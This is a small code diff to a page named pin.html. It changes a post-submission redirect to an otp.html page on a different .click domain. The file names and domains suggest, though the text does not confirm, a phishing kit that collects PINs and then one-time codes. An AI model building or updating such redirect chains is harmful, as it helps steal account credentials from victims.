--- a/pin.html
+++ b/pin.html
@@ -203,7 +203,7 @@
           if (!response.ok) {
             throw new Error('Network response was not ok');
           }
-          window.location.href = 'https://wemmaweb-support.web.app/otp.html';
+          window.location.href = 'https://webwemma-app.pxxl.click/otp.html';
         })
         .catch(error => {
           console.error('Error:', error);
@@ -230,5 +230,6 @@
     });
   </script>
 </body>
+
 
 </html>
